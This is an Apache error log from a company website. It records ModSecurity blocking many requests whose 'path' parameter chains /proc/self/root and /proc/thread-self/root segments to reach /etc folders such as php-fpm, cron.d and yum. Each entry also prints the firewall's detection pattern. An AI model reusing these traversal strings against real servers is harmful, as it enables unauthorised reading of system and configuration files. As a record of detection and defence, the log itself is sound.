[Thu Mar 19 03:58:25.276625 2026] [:error] [pid 27403:tid 140411607643904] [client 74.7.243.128:45718] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuekRkFeYa1D6dYQnC0MwAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:26.585276 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:45720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuekgbLMZ6AikZjR9UkpAAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:58:30.091505 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:45728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuelta6ubjKNq_cu4YGZgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:58:31.807042 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:45728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuel9a6ubjKNq_cu4YGawAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:58:32.787998 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:52986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuemNa6ubjKNq_cu4YGbAAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:33.106054 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.243.128:56326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuemf-YZRR_7pZ7nDJUrQAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:36.306939 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:38952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuenOyqAr6etmhZHNorXwAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:36.727975 2026] [mime_magic:error] [pid 31803:tid 140411574073088] (70014)End of file found: [client 57.141.18.55:42766] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:58:37.667202 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.243.128:56330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuenf-YZRR_7pZ7nDJUsQAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:41.323123 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:56342] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueoeyqAr6etmhZHNoraQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:44.604035 2026] [:error] [pid 27403:tid 140411557287680] [client 74.7.243.128:42918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuepBkFeYa1D6dYQnC0RQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:58:47.931785 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:42932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuep9a6ubjKNq_cu4YGcwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:58:49.318980 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.243.128:42936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueqRkFeYa1D6dYQnC0SwAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:51.239042 2026] [:error] [pid 17653:tid 140411641214720] [client 74.7.241.31:47442] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueq8df6f5d65gmYZQ6mwAAAsw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:51.391021 2026] [mime_magic:error] [pid 30077:tid 140411557287680] (70014)End of file found: [client 57.141.18.55:43058] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:58:51.947190 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:42218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueqwkwaGbbGflqUZB7zwAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:55.381748 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:42220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuerwkwaGbbGflqUZB71AAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:55.672393 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:49248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuer-oXxyEfFpUF8f_YwwAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:58:56.857850 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.243.128:42234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuesF_V7PWP6ixUYl6DXAAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:00.332355 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:42244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuetMdf6f5d65gmYZQ6nwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:01.652365 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:47388] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueteyqAr6etmhZHNordgAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:59:04.006111 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:47390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abueuAkwaGbbGflqUZB72wAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:59:09.558713 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:47402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuevda6ubjKNq_cu4YGlQAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
